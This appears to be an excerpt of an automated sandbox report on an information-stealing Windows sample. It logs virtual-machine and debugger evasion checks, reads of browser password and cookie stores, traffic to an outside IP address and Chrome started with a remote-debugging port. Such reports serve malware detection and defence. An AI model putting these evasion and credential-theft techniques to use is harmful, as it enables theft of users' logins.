Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6760 Thread sleep time: -806600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2160676616.000001DA2F6A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AD4q0qFvM8.exe, 00000000.00000003.1770853111.0000000006911000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: NTICE
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: SICE
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: SIWVID
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D68230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 8_2_00D68230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D6116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_00D6116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D611A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00D611A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D61160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_00D61160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00D613C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_00D613C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1584D0 cpuid 8_2_6C1584D0
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: AD4q0qFvM8.exe, 00000000.00000003.1732043277.0000000007370000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 8.2.service123.exe.6c0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 3696, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: C:\Users\user\Desktop\AD4q0qFvM8.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP